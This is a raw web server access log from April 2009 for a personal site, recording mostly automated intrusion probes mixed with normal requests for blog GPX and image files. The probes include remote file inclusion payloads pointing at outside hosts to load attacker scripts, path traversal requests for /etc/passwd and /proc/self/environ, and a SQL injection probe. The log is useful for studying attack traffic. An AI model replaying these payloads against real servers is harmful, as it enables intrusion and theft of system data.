91.195.124.11 - - [28/Apr/2009:11:50:58 -0700] "GET /logs/access_080305.log%20%20/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:11:50:58 -0700] "GET /12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:11:50:58 -0700] "GET /logs/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:51:00 -0700] "GET /logs/access_080808.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:51:01 -0700] "GET /logs/access_080511.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:51:01 -0700] "GET /logs/access_080223.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:11:51:06 -0700] "GET /logs/access_090130.log%20%20/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:11:51:19 -0700] "GET /logs/access_090130.log%20%20/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.117.38.36 - - [28/Apr/2009:11:51:35 -0700] "GET /logs/access_080131.log/includes/include_once.php?include_file=http://www.filregalo.com/docs/zencart.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.117.38.36 - - [28/Apr/2009:11:51:35 -0700] "GET /includes/include_once.php?include_file=http://www.filregalo.com/docs/zencart.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.117.38.36 - - [28/Apr/2009:11:51:35 -0700] "GET /logs/includes/include_once.php?include_file=http://www.filregalo.com/docs/zencart.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:51:37 -0700] "GET /logs/access_080514.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.110.170 - - [28/Apr/2009:11:51:39 -0700] "GET /logs/access_081103.log/products.php?catid=' HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.52.110.170 - - [28/Apr/2009:11:51:39 -0700] "GET /products.php?catid=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.52.110.170 - - [28/Apr/2009:11:51:39 -0700] "GET /logs/products.php?catid=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:51:41 -0700] "GET /logs/access_080514.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:52:09 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:52:09 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:52:09 -0700] "GET /logs/access_071214.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:52:34 -0700] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:52:37 -0700] "GET /index2.php?mosConfig_absolute_path=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:52:38 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:52:55 -0700] "GET /logs/access_081104.log//index2.php?mosConfig_absolute_path=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:52:55 -0700] "GET /index2.php?mosConfig_absolute_path=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:11:52:59 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:53:15 -0700] "GET /logs/access_071214.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:53:39 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:53:39 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:53:39 -0700] "GET /logs/access_071214.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:54:23 -0700] "GET /logs/access_071214.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:54:24 -0700] "GET /logs/access_081112.log/index.php?arquivo=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:54:24 -0700] "GET /logs/index.php?arquivo=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:54:25 -0700] "GET /logs/access_090210.log/index.php?arquivo=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:54:26 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:54:39 -0700] "GET /logs/access_080425.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:54:40 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
200.12.51.30 - - [28/Apr/2009:11:54:56 -0700] "GET /logs/index.php?kobr=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:55:00 -0700] "GET /index.php?arquivo=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 500 292 "-" "libwww-perl/5.810" "www.dmulk.com"
200.12.51.30 - - [28/Apr/2009:11:55:10 -0700] "GET /logs/access_090109.log%20%20/index.php?kobr=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:55:14 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:55:20 -0700] "GET /logs/access_081112.log/index.php?arquivo=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:55:20 -0700] "GET /logs/index.php?arquivo=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:55:20 -0700] "GET /logs/access_090210.log/index.php?arquivo=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:55:29 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:55:40 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:55:52 -0700] "GET /logs/access_080425.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.12.51.30 - - [28/Apr/2009:11:55:53 -0700] "GET /index.php?kobr=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 200 43347 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:55:55 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:55:57 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:56:08 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.117.38.36 - - [28/Apr/2009:11:56:15 -0700] "GET /logs/access_080520.log/includes/include_once.php?include_file=http://www.filregalo.com/docs/zencart.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:11:56:20 -0700] "GET /index.php?arquivo=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 200 43297 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:56:39 -0700] "GET /logs/access_090103.log//ask_password.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:56:39 -0700] "GET /ask_password.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:56:39 -0700] "GET /logs//ask_password.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:56:43 -0700] "GET /logs/access_090314.log//ask_password.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:57:11 -0700] "GET /logs/access_080414.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:11:57:12 -0700] "GET /logs/index1.php?choix=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:11:57:12 -0700] "GET /index1.php?choix=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:11:57:12 -0700] "GET /logs/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:11:57:12 -0700] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:11:57:13 -0700] "GET /logs/index1.php?choix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:11:57:13 -0700] "GET /index1.php?choix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:11:57:13 -0700] "GET /index1.php?choix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:57:16 -0700] "GET /logs/access_080427.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:11:57:18 -0700] "GET /logs/index1.php?choix=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:57:28 -0700] "GET /logs/access_080425.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.24.242.98 - - [28/Apr/2009:11:58:04 -0700] "GET /blog/wp-content/gallery/2008-yuma/thumbs/thumbs_025_0.jpg HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
212.24.242.98 - - [28/Apr/2009:11:58:13 -0700] "GET /blog/wp-content/gallery/2008-yuma/thumbs/thumbs_032_0.jpg HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
200.12.51.30 - - [28/Apr/2009:11:58:30 -0700] "GET /logs/access_080810.log%20%20/index.php?kobr=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:58:46 -0700] "GET /logs/access_080919.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:58:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:58:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:59:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:59:05 -0700] "GET /logs/access_080919.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:59:05 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:59:40 -0700] "GET /include/admin.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:59:40 -0700] "GET /logs/access_081015.log//include/admin.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:59:40 -0700] "GET /logs/access_080919.log//include/admin.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:59:40 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:00:08 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:00:43 -0700] "GET /logs/access_090323.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:00:43 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:00:43 -0700] "GET /logs/access_090224.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:00:45 -0700] "GET /logs/access_090207.log/index.php?opcao=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:00:45 -0700] "GET /logs/index.php?opcao=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.24.242.98 - - [28/Apr/2009:12:00:45 -0700] "GET /blog/wp-content/gallery/2008-yuma/thumbs/thumbs_030_0.jpg HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:00:47 -0700] "GET /logs/access_090118.log/index.php?opcao=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:12:00:50 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:12:00:50 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:12:00:54 -0700] "GET /logs/access_080305.log/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.24.242.98 - - [28/Apr/2009:12:00:57 -0700] "GET /blog/wp-content/gallery/2008-yuma/thumbs/thumbs_044.jpg HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
64.157.4.42 - - [28/Apr/2009:12:01:14 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:12:01:16 -0700] "GET /logs/access_090130.log/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:12:01:16 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:01:28 -0700] "GET /logs/access_090207.log/index.php?opcao=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:01:28 -0700] "GET /logs/index.php?opcao=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:01:28 -0700] "GET /logs/access_090118.log/index.php?opcao=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:12:01:29 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:12:01:33 -0700] "GET /logs/access_080425.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:12:01:33 -0700] "GET /logs/access_080305.log/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:12:01:39 -0700] "GET /logs/access_090130.log/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:12:01:42 -0700] "GET /logs/access_080305.log/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:12:01:45 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:01:54 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 200 43474 "-" "Mozilla/5.0" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:01:57 -0700] "GET /index.php?opcao=http://http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 200 43319 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.137 - - [28/Apr/2009:12:02:11 -0700] "GET /index.php?opcao=http://ddwvideo.dd.funpic.org/osy2.txt??? HTTP/1.1" 200 43293 "-" "libwww-perl/5.810" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:12:02:42 -0700] "GET /logs/access_090130.log/12all/admin/errors.php?error=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:03:01 -0700] "GET /logs/access_090323.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:03:03 -0700] "GET /logs/access_090224.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.148.214 - - [28/Apr/2009:12:03:03 -0700] "GET /logs/access_090106.log/index.php?pg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:12:03:11 -0700] "GET /file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:12:03:11 -0700] "GET /logs/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:12:03:11 -0700] "GET /logs/access_081120.log/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.148.214 - - [28/Apr/2009:12:03:19 -0700] "GET /logs/access_081210.log/index.php?pg=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:03:29 -0700] "GET /logs/access_090408.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:03:30 -0700] "GET /logs/access_090408.log/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:03:30 -0700] "GET /logs/access_090408.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:03:30 -0700] "GET /logs/access_090408.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
203.22.204.193 - - [28/Apr/2009:12:03:51 -0700] "GET /logs/access_070917.log/index.php?p=http://91.203.132.162/.q/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:03:52 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
203.22.204.193 - - [28/Apr/2009:12:03:56 -0700] "GET /logs/index.php?p=http://91.203.132.162/.q/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:04:08 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
221.141.3.98 - - [28/Apr/2009:12:04:13 -0700] "GET /logs/access_090408.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
